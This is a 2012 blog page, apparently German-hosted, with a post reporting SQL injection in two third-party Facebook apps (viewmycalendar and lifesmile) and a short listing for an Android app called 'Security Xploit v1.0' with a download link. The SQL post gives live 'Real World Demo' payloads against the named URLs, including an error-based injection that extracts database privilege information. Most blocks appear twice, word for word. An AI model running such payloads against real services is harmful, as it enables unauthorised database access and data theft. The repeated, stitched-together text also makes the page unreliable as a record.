... neuere Einträge
Tuesday, 14. February 2012
Facebook - SQL Injection
Am Tuesday, 14. Feb 2012 im Topic 'Vulnerabilities'
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/viewmycalendar/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/viewmycalendar/index.php?page=1'
----------------------------------------------------------------------
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/lifesmile/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)
by
Ninja-Sec
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/viewmycalendar/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/viewmycalendar/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/viewmycalendar/index.php?page=1'
----------------------------------------------------------------------
Details:
========
A remote SQL Injection vulnerability is detected on the Facebook Life Smile
(apps.facebook).
The vulnerability allows an attacker (remote) to inject/execute own sql
statements on the affected fb application dbms.
Vulnerable Module(s):
[+] Life Smile - Facebook 3rd Party
Application
Vulnerable Param(s)/File(s):
[+] index.php
Affected Application:
[+] apps.facebook.com/lifesmile/
Sql Error
Example:
http://[APP-SERVER]/[SERVICE-APP]/[FILE].[PHP]?=[SQL Injection]
PoC:
http://apps.facebook.com/lifesmile/index.php?page=[SQL-Injection]
Real World Demo :
http://apps.facebook.com/lifesmile/index.php?page=210 AND (SELECT 1793
FROM(SELECT COUNT(*),CONCAT(0x3a626a7a3a,(SELECT
MID((IFNULL(CAST(privilege_type AS CHAR),0x20)),1,50) FROM
INFORMATION_SCHEMA.USER_PRIVILEGES LIMIT
0,1),0x3a7672703a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a)
by
Ninja-Sec
Security Xploit v1.0 - Android App
Am Tuesday, 14. Feb 2012 im Topic 'Android'
Requirements
Requires Android Market and Google account:
No
Requires third-party libraries:
No
Requires 'rooted' device:
No
Target Android version:
Android 3.2
Minimum Android version:
Android 1.6
Minimum screen width:
240 dpx
Download
http://slideme.org/mobileapp/download/1a3dc792-55a7-11e1-a703-00505690390e.apk
Requires Android Market and Google account:
No
Requires third-party libraries:
No
Requires 'rooted' device:
No
Target Android version:
Android 3.2
Minimum Android version:
Android 1.6
Minimum screen width:
240 dpx
Download
http://slideme.org/mobileapp/download/1a3dc792-55a7-11e1-a703-00505690390e.apk
... ältere Einträge